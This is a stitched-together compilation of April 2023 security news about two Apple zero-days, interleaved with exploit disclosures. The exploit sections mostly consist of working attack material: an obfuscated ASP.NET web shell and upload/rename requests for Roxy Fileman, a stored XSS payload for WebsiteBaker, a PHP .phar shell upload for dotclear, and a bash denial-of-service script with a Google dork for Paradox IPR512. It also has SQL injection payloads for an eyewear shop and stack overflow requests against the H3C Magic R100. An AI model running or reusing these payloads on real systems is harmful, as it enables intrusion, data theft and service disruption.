Unpatched Macs, iPhones, and iPads open to browser takeover and system kernel-level malicious code execution, Apple warns.

On April 7, Apple released two security updates warning about two zero-day vulnerabilities under active exploit in the wild. By April 10, those were added to the Cybersecurity and Infrastructure Security Agency (CISA) known exploited vulnerabilities (KEV) list.

The impact of the two vulnerabilities is widespread, affecting macOS Ventura 13.3.1 for Apple Macs, in addition to the iOS 16.4.1 and iPadOS 16.4.1 operating systems used to run iPhones and iPads, according to Apple.

The first bug, CVE-2023-28205, is a flaw in Apple iOS, iPad OS, macOS, and Safari WebKit that could lead to code injection while processing malicious Web content, CISA explained. The second, CVE-2023-28206, affects Apple iOS, iPadOS, and macOS IOSurfaceAccelerator that, worryingly, could allow a malicious app to execute code with kernel privileges, CISA said.

Apple has issued updates for iOS 16 and iPad OS 16. Other macOS versions including Big Sur Monterey, and Ventura have patches that need to be installed, and as Sophos pointed out in a separate advisory, it's still unclear whether the bugs will impact iOS 15 users with older devices.

Both issues were reported by Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International's Security Lab, giving cybersecurity experts reason to believe the flaws are being exploited by state actors to deploy spyware.

"It is interesting that Amnesty International's Security Lab was one of the organizations involved in finding reporting the issue," Mike Parkin, senior technical engineer with Vulcan Cyber explained in a statement provided to Dark Reading. "While Apple hasn't said much about the exploits, it seems likely, given the reporting and earlier history, that the exploits were deployed by state-level threat actors."

Pair of Apple Zero-Days Under Active Exploit; Patch & Update Accordingly

A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

This document describes the security content of Safari 16.4.1.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Safari 16.4.1**

Released April 7, 2023

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 254797  
CVE-2023-28205: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: April 07, 2023

CVE-2023-28205: About the security content of Safari 16.4.1

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

Paradox Security Systems version IPR512 suffers from a denial of service vulnerability.

#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service  
# Google Dork: intitle:"ipr512 * - login screen"  
# Date: 09-APR-2023  
# Exploit Author: Giorgi Dograshvili  
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)  
# Version: IPR512  
# CVE : CVE-2023-24709

# Function to display banner message  
display_banner() {  
  echo "******************************************************"  
  echo "*                                                    *"  
  echo "*                PoC CVE-2023-24709                  *"  
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"  
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"  
  echo "*                                by SlashXzerozero   *"  
  echo "*                                                    *"  
  echo "******************************************************"  
}

# Call the function to display the banner  
display_banner  
  echo ""  
  echo ""  
  echo "Please enter a domain name or IP address with or without port"  
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation  
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm  
if [[ $confirm == "Y" || $confirm == "y" ]]; then  
  # Display loading animation  
  animation=("|" "/" "-" "\\")  
  index=0  
  while [[ $index -lt 10 ]]; do  
    echo -ne "Loading ${animation[index]} \r"  
    sleep 1  
    index=$((index + 1))  
  done

  # Use curl to send HTTP GET request with custom headers and timeout  
  response=$(curl -i -s -k -X GET \  
    -H "Host: $domain" \  
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \  
    -H "Accept: */" \  
    -H "Referer: http://$domain/login.html" \  
    -H "Accept-Encoding: gzip, deflate" \  
    -H "Accept-Language: en-US,en;q=0.9" \  
    -H "Connection: close" \  
    --max-time 10 \  
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result  
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then  
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"  
  else  
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"  
  fi  
else  
  echo "The script is stopped!."  
fi

Paradox Security Systems IPR512 Denial Of Service

A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.

**Online Eyewear Shop v1.0 has SQL injection**

BUG\_Author:Gear-D

Website source address:https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html

Vulnerability File: /oews/admin/inventory/manage\_stock.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x61626364,(select (elt(999=999,1))),0x75767778,floor(rand(0)\*2))x from information\_schema.plugins group by x)a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x61626364,(select%20(elt(999=999,1))),0x75767778,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(5)))a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from%20(select(sleep(5)))a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close

CVE-2023-1969: bug_report/SQLi-1.md at main · Gear-D/bug_report

Apple on Friday released security updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws that are being exploited in the wild.
The two vulnerabilities are as follows -

CVE-2023-28205 - A use after free issue in WebKit that could lead to arbitrary code execution when processing specially crafted web content.


CVE-2023-28206 - An out-of-bounds write issue in

Zero-Day / Endpoint Security

Apple on Friday released security updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws that are being exploited in the wild.

The two vulnerabilities are as follows -

*   **CVE-2023-28205** - A use after free issue in WebKit that could lead to arbitrary code execution when processing specially crafted web content.

*   **CVE-2023-28206** - An out-of-bounds write issue in IOSurfaceAccelerator that could enable an app to execute arbitrary code with kernel privileges.

Apple said it addressed CVE-2023-28205 with improved memory management and the second with better input validation, adding it's aware the bugs "may have been actively exploited."

Credited with discovering and reporting the flaws are Clément Lecigne of Google's Threat Analysis Group (TAG) and Donncha Ó Cearbhaill of Amnesty International's Security Lab.

Details about the two vulnerabilities have been withheld in light of active exploitation and to prevent more threat actors from abusing them.

The updates are available in version iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1, and Safari 16.4.1. The fixes also span a wide range of devices -

*   iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   Macs running macOS Big Sur, Monterey, and Ventura

Apple has patched three zero-days since the start of the year. In February, Apple addressed another actively exploited zero-day (CVE-2023-23529) in WebKit that could result in arbitrary code execution.

The development also comes as Google TAG disclosed that commercial spyware vendors are leveraging zero-days in Android and iOS to infect mobile devices with surveillance malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases Updates to Address Zero-Day Flaws in iOS, iPadOS, macOS, and Safari

H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.

\# H3C Magic R100 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R100\` vendor:H3C product:Magic R100 version:R100V100R005.bin type:Stack Overflow author:Yifeng Li, Wolin Zhuang; ## Vulnerability Description H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. ## Vulnerability Details In function DeltriggerList(sub\_454110),the size of local variable v7 is noly 16 bytes long.Parameters in the DeltriggerList interface use the getElement function to split strings(VAr). !\[\](https://i.imgur.com/L7TAJ4l.png) !\[\](https://i.imgur.com/tIRFgA5.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Install firmware R100V100R005.bin to router Magic\_R100(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/0UFAh9L.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 2026 CMD=DeltriggerList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/emF6twO.png) And you can write your own exp to get the root shell.

CVE-2023-27808: H3C Magic R100 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm - HackMD

H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the ipqos_lanip_dellist interface at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.

\# H3C Magic R100 was discovered stack overflow via the ipqos\_lanip\_dellist interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R100\` vendor:H3C product:Magic R100 version:R100V100R005.bin type:Stack Overflow author:Yifeng Li, Wolin Zhuang; ## Vulnerability Description H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the ipqos\_lanip\_dellist interface at /goform/aspForm. ## Vulnerability Details In function ipqos\_lanip\_dellist(sub\_436EB8),the size of local variable v5 is noly 16 bytes long.Parameters in the ipqos\_lanip\_dellist interface use the getElement function to split strings(VAr). !\[\](https://i.imgur.com/X83HIGc.png) !\[\](https://i.imgur.com/t6KSw9k.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Install firmware R100V100R005.bin to router Magic\_R100(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/0UFAh9L.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Content-Length: 2031 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: \*/\* Origin: http://192.168.124.1 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close 